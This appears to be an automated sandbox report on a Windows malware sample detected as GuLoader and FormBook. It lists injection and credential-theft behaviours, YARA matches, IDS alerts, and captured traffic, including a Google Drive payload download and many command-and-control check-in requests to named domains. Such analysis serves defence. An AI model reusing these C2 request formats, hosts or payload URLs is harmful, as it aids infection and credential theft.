Windows Analysis Report
Grundforbedre39.exe

Overview

General Information

Sample name: Grundforbedre39.exe
Analysis ID: 1410990
MD5: 0190a49f09dc90c7dc61959581be1e9f
SHA1: af5d8cfa73b77d96d3a489f5961cdab87c8339be
SHA256: cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • Grundforbedre39.exe (PID: 1984 cmdline: C:\Users\user\Desktop\Grundforbedre39.exe MD5: 0190A49F09DC90C7DC61959581BE1E9F)
    • Grundforbedre39.exe (PID: 9636 cmdline: C:\Users\user\Desktop\Grundforbedre39.exe MD5: 0190A49F09DC90C7DC61959581BE1E9F)
      • aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe (PID: 2820 cmdline: "C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netiougc.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\netiougc.exe MD5: DD8D09523CDB5610078DF64BA4889806)
          • aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe (PID: 7756 cmdline: "C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8920 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x95754:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x7f773:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2b500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1551f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched
        Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
        03/18/24-14:47:52.396598 | 2855465 | 49778 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:19.191753 | 2855464 | 49792 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:38.822796 | 2855464 | 49805 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:01.784764 | 2855464 | 49787 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:23.875361 | 2855465 | 49832 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:48:47.962356 | 2855464 | 49782 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:54.719267 | 2855465 | 49799 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:15.768570 | 2855464 | 49829 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:24.598414 | 2855465 | 49795 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:55:12.378053 | 2855464 | 49836 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:48:50.665934 | 2855464 | 49783 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:07.208566 | 2855464 | 49789 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:48:56.063124 | 2855465 | 49786 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:46.684407 | 2855464 | 49796 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:09.906007 | 2855465 | 49790 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:55:17.783109 | 2855465 | 49838 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:04.569559 | 2855464 | 49826 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:57.738933 | 2855465 | 49811 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:55:09.672400 | 2855464 | 49835 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:52.365896 | 2855464 | 49809 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:52:14.229849 | 2855464 | 49813 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:55:27.140061 | 2855464 | 49840 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:49.684588 | 2855464 | 49808 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:16.488398 | 2855464 | 49791 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:49.359644 | 2855464 | 49797 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:18.470972 | 2855464 | 49830 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:52:11.542639 | 2855464 | 49812 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:44.071965 | 2855465 | 49807 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:55:23.264523 | 2855464 | 49839 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:52:19.603596 | 2855465 | 49815 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:09.929078 | 2855465 | 49828 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:49:04.487515 | 2855464 | 49788 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:51:36.209099 | 2855464 | 49804 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:01.883179 | 2855464 | 49825 | 80 | TCP | A Network Trojan was detected
        03/18/24-14:54:32.207163 | 2855465 | 49834 | 80 | TCP | A Network Trojan was detected


        AV Detection

        Source: Grundforbedre39.exe | Avira: detected
        Source: http://www.guiguigohost.com/m9so/ | Avira URL Cloud: Label: malware
        Source: Grundforbedre39.exe | ReversingLabs: Detection: 23%
        Source: Yara match | File source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Grundforbedre39.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2
        Source: Grundforbedre39.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: netiougc.pdbGCTL source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, 00000009.00000002.5890904969.0000000000A5E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Grundforbedre39.exe, Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: netiougc.pdb source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Grundforbedre39.exe | Code function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\Grundforbedre39.exe | Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\Grundforbedre39.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB

        Networking

        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49778 -> 172.67.158.92:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49782 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49786 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 46.30.215.63:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 46.30.215.63:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49789 -> 46.30.215.63:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49790 -> 46.30.215.63:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 91.195.240.19:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 91.195.240.19:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49795 -> 91.195.240.19:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49797 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49799 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 172.67.130.3:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49805 -> 172.67.130.3:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49807 -> 172.67.130.3:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49809 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49811 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 217.70.184.50:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49813 -> 217.70.184.50:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49815 -> 217.70.184.50:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49826 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49828 -> 84.32.84.32:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 195.110.124.133:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49830 -> 195.110.124.133:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49832 -> 195.110.124.133:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49834 -> 172.67.158.92:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49836 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49838 -> 198.177.123.106:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49839 -> 46.30.215.63:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49840 -> 46.30.215.63:80
        Source: Joe Sandbox View | IP Address: 172.67.158.92
        Source: Joe Sandbox View | IP Address: 195.110.124.133
        Source: Joe Sandbox View | IP Address: 198.177.123.106
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
        Source: Joe Sandbox View | ASN Name: REGISTER-ASIT
        Source: Joe Sandbox View | ASN Name: FINALFRONTIERVG
        Source: Joe Sandbox View | ASN Name: ONECOMDK
        Source: Joe Sandbox View | ASN Name: NTT-LT-ASLT
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noonartists.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.alpinebretech.lifeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.manupaint.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.plainpathproductions.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.teenpattimasterapp.orgConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wbyzm5.buzzConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.feshi.storeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.meliorras.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=Xg8FqCUssmOzcClrP1dUBt9Tduj8pb94TVXDuPCTJTreZhcpD3ySUs7Oc+hlxVab0la101jy3sXphv2K+D5gks93TxumRvYq05TzXtp4wx5urQWvjqWwNhA=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.guiguigohost.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: unknown | DNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /m9so/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.alpinebretech.lifeOrigin: http://www.alpinebretech.lifeReferer: http://www.alpinebretech.life/m9so/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4a 49 46 31 56 2b 66 73 58 70 51 76 39 6a 4d 78 59 36 63 56 50 45 6f 68 43 71 33 6c 59 70 4c 49 63 64 30 4e 41 4c 45 41 64 68 7a 44 33 70 6f 66 45 54 58 71 54 45 2f 66 61 78 46 62 5a 47 57 63 64 41 73 4a 46 79 77 70 33 78 58 74 7a 61 77 31 4b 54 6d 46 4a 50 75 47 64 64 64 2f 44 57 57 39 6f 58 70 69 74 52 69 64 30 57 71 6e 37 61 57 4a 50 33 6e 36 31 2f 46 49 78 45 76 36 52 4d 30 4b 43 73 4d 6a 73 39 4e 4c 4b 63 38 35 43 34 42 56 76 78 30 44 68 34 54 6f 76 6a 41 73 4d 59 61 66 54 68 31 65 75 77 33 48 67 74 5a 45 43 6f 35 50 67 6a 63 52 77 77 3d 3d Data Ascii: LFPxWlV=ghHQ3Gr/MCFEJIF1V+fsXpQv9jMxY6cVPEohCq3lYpLIcd0NALEAdhzD3pofETXqTE/faxFbZGWcdAsJFywp3xXtzaw1KTmFJPuGddd/DWW9oXpitRid0Wqn7aWJP3n61/FIxEv6RM0KCsMjs9NLKc85C4BVvx0Dh4TovjAsMYafTh1euw3HgtZECo5PgjcRww==
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:48:56 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:54:15 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:54:18 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:54:21 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:54:23 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 13:55:17 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
